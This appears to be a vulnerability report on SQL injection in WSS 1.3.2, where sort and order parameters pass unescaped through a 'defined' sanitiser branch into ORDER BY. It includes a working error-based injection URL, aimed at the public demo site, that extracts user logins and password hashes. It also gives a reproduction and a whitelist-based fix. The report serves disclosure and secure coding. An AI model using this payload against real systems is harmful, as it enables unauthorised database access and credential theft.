### Brief description:
WSS latest version, multiple SQL injections that directly retrieve data (part three), demonstrated on the official demo. There are several injection points here, and this report summarises them as one issue.
### Detailed description:
WSS latest version 1.3.2. There are several injection points here; this report traces them to a single root cause and shows how to quickly find every instance of the same problem.
```
The vulnerabilities here have no permission restriction at all: any user can inject.
```
Vulnerability analysis:
[WooYun: WSS latest version, SQL injection at a certain place directly retrieving data (part two, two instances)](http://www.wooyun.org/bugs/wooyun-2014-084139)
The previous report already walked through how this vulnerability arises:
a design flaw in the global filter function leads to SQL injection.
```
if (!function_exists("GetSQLValueString")) {
    // Dreamweaver-generated helper that WSS uses everywhere to "sanitise" a value
    // before sprintf'ing it into SQL. Only the text/long/int/double/date branches
    // actually return the escaped (or type-cast) value.
    function GetSQLValueString($theValue, $theType, $theDefinedValue = "", $theNotDefinedValue = "")
    {
        if (PHP_VERSION < 6) {
            $theValue = get_magic_quotes_gpc() ? stripslashes($theValue) : $theValue;
        }
        $theValue = function_exists("mysql_real_escape_string") ? mysql_real_escape_string($theValue) : mysql_escape_string($theValue);
        switch ($theType) {
            case "text":
                $theValue = ($theValue != "") ? "'" . $theValue . "'" : "NULL";
                break;
            case "long":
            case "int":
                $theValue = ($theValue != "") ? intval($theValue) : "NULL";
                break;
            case "double":
                $theValue = ($theValue != "") ? doubleval($theValue) : "NULL";
                break;
            case "date":
                $theValue = ($theValue != "") ? "'" . $theValue . "'" : "NULL";
                break;
            case "defined":
                // The escaped $theValue is discarded: the caller's $theDefinedValue
                // is returned verbatim, so whatever the caller passes reaches the query.
                $theValue = ($theValue != "") ? $theDefinedValue : $theNotDefinedValue;
                break;
        }
        return $theValue;
    }
}
```
Look here:
```
case "defined":
$theValue = ($theValue != "") ? $theDefinedValue : $theNotDefinedValue;
```
If execution reaches this branch, the escaped value is thrown away and `$theDefinedValue` is returned as-is, which amounts to no processing at all.
The problem is that the program uses this `defined` type in a great many places, so the filter is useless there.
Locating the vulnerabilities:
Search the whole code base for:
```
"defined",
```
This gives 6 places where the vulnerability exists:
[![3.png](https://images.seebug.org/upload/201411/211728428813a4f7a754ce4009baa01742f3ed42.png)](https://images.seebug.org/upload/201411/211728428813a4f7a754ce4009baa01742f3ed42.png)
default_user.php was analysed in detail in the previous report.
Here we look at control_project.php and control_task.php.
Taking control_task.php as an example:
```
......
// Sort column and sort direction are taken straight from the query string.
$sortlist = "csa_last_update";
if (isset($_GET['sort'])) {
    $sortlist = $_GET['sort'];
}
$orderlist = "DESC";
if (isset($_GET['order'])) {
    $orderlist= $_GET['order'];
}
......
$query_Recordset1 = sprintf("SELECT *,
    tk_project.project_name as project_name_prt,
    tk_user1.tk_display_name as tk_display_name1,
    tk_user2.tk_display_name as tk_display_name2
    FROM tk_task
    inner join tk_task_tpye on tk_task.csa_type=tk_task_tpye.id
    inner join tk_project on tk_task.csa_project=tk_project.id
    inner join tk_user as tk_user1 on tk_task.csa_to_user=tk_user1.uid
    inner join tk_user as tk_user2 on tk_task.csa_from_user=tk_user2.uid
    inner join tk_status on tk_task.csa_remark2=tk_status.id
    $where
    (tk_task.csa_plan_st <=%s
    AND tk_task.csa_plan_et >=%s
    OR tk_task.csa_plan_st <=%s
    AND tk_task.csa_plan_et >=%s
    OR tk_task.csa_plan_st >=%s
    AND tk_task.csa_plan_et <=%s)
    ORDER BY %s %s",
    GetSQLValueString($startday , "text"),
    GetSQLValueString($startday , "text"),
    GetSQLValueString($endday , "text"),
    GetSQLValueString($endday , "text"),
    GetSQLValueString($startday , "text"),
    GetSQLValueString($endday , "text"),
    // "defined" hands back $sortlist / $orderlist untouched: raw user input lands in ORDER BY.
    GetSQLValueString($sortlist, "defined", $sortlist, "NULL"),
    GetSQLValueString($orderlist, "defined", $orderlist, "NULL")
);
$query_limit_Recordset1 = sprintf("%s LIMIT %d, %d", $query_Recordset1, $startRow_Recordset1, $maxRows_Recordset1);
// or die(mysql_error()) echoes the MySQL error to the page, which is what makes error-based extraction work.
$Recordset1 = mysql_query($query_limit_Recordset1, $tankdb) or die(mysql_error());
$row_Recordset1 = mysql_fetch_assoc($Recordset1);
```
The root cause is identical to the previous report:
the sort and order parameters go through GetSQLValueString with the "defined" type, so the filtering has no effect.
Requesting control_project.php and control_task.php directly does not work; they throw an error.
That error also discloses the absolute path on the server:
[![4.png](https://images.seebug.org/upload/201411/21173055ebdd176997f288d1f159401fe1e34a38.png)](https://images.seebug.org/upload/201411/21173055ebdd176997f288d1f159401fe1e34a38.png)
So these files must be included from somewhere else.
Search the code base again for:
```
control_project
```
It is included from /project.php:
```
<div class="pagemargin">
<?php require('control_project.php'); ?>
</div>
```
Then search for:
```
control_task
```
It is included from /index.php:
```
<div class="pagemargin">
<?php require('control_task.php'); ?>
</div>
```
Because the vulnerable code is pulled into the index.php and project.php pages, and neither control_project.php nor control_task.php applies any permission check, every user can reach it.
Below we test this on the official demo.
### Proof of vulnerability:
The official demo runs the latest release, 1.3.2.
```
http://wssys.sinaapp.com/project.php?sort=uid%20and%20(select%201%20from%20(select%20count(*),concat(floor(rand(0)*2),(select%20concat(0x23,tk_user_login,0x23,tk_user_pass)%20from%20tk_user%20limit%200,1))a%20from%20information_schema.tables%20group%20by%20a)b)%23&order=222222%27
```
[![2.png](https://images.seebug.org/upload/201411/2117375001f9a4da3b66f6d6bd51cc978ec39495.png)](https://images.seebug.org/upload/201411/2117375001f9a4da3b66f6d6bd51cc978ec39495.png)
```
http://wssys.sinaapp.com/project.php?sort=uid%20and%20(select%201%20from%20(select%20count(*),concat(floor(rand(0)*2),(select%20concat(0x23,tk_user_login,0x23,tk_user_pass)%20from%20tk_user%20limit%200,1))a%20from%20information_schema.tables%20group%20by%20a)b)%23&order=222222%27
```
[![1.png](https://images.seebug.org/upload/201411/21173803ca48996b92e2d053cf31434fed43a910.png)](https://images.seebug.org/upload/201411/21173803ca48996b92e2d053cf31434fed43a910.png)
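The following is an added example written for this write-up; it is not WSS code and not part of the original report. It reproduces the `defined` pass-through behaviour with a stand-in function, builds a shortened version of the ORDER BY query from control_task.php, feeds it the URL-decoded `sort`/`order` values from the PoC above, and then shows a whitelist-based replacement. The query body and the list of allowed columns are assumptions chosen to look like the page's schema, not WSS's real configuration.

```php
<?php
// Stand-in for GetSQLValueString($v, "defined", $v, "NULL"): the "defined"
// branch returns $theDefinedValue verbatim, i.e. the raw request value.
function definedPassThrough(string $value): string
{
    return $value !== '' ? $value : 'NULL';
}

// Vulnerable construction, mirroring control_task.php (query shortened,
// table name taken from the page). Both placeholders sit in ORDER BY.
function buildVulnerableQuery(array $get): string
{
    $sort  = $get['sort']  ?? 'csa_last_update';
    $order = $get['order'] ?? 'DESC';
    return sprintf("SELECT * FROM tk_task ORDER BY %s %s",
        definedPassThrough($sort), definedPassThrough($order));
}

// Hardened construction. ORDER BY takes identifiers, so neither quoting nor
// prepared-statement placeholders can protect it; the only safe approach is a
// strict whitelist of column names and directions, falling back to defaults.
// (Column list is an assumption for this example.)
const ALLOWED_SORT_COLUMNS = ['csa_last_update', 'csa_plan_st', 'csa_plan_et', 'project_name'];

function buildSafeQuery(array $get): string
{
    $sort  = $get['sort']  ?? 'csa_last_update';
    $order = strtoupper($get['order'] ?? 'DESC');
    if (!in_array($sort, ALLOWED_SORT_COLUMNS, true)) {
        $sort = 'csa_last_update';
    }
    if ($order !== 'ASC' && $order !== 'DESC') {
        $order = 'DESC';
    }
    // The identifier is already whitelisted; backticks only guard against reserved words.
    return sprintf("SELECT * FROM tk_task ORDER BY `%s` %s", $sort, $order);
}

// The PoC's sort/order values, URL-decoded (constructed from the request above).
// It is the classic error-based extraction: floor(rand(0)*2) combined with
// GROUP BY triggers a duplicate-key error whose message carries the
// concat()'d login and password hash; the trailing # comments out the rest.
$poc = [
    'sort'  => "uid and (select 1 from (select count(*),concat(floor(rand(0)*2),"
             . "(select concat(0x23,tk_user_login,0x23,tk_user_pass) from tk_user limit 0,1))a"
             . " from information_schema.tables group by a)b)#",
    'order' => "222222'",
];

echo buildVulnerableQuery($poc), "\n"; // subquery lands in ORDER BY; "222222'" is commented out by #
echo buildSafeQuery($poc), "\n";       // SELECT * FROM tk_task ORDER BY `csa_last_update` DESC
```

When auditing for this bug class, the pattern to flag is any `GetSQLValueString(..., "defined", $x, ...)` call where `$x` is derived from `$_GET`, `$_POST` or `$_COOKIE`: the third argument is returned untouched regardless of what escaping happened inside the function. Note also that switching these two calls to the `"text"` type would not be a fix, since a quoted string in ORDER BY just sorts by a constant; the whitelist is the right shape for an identifier position.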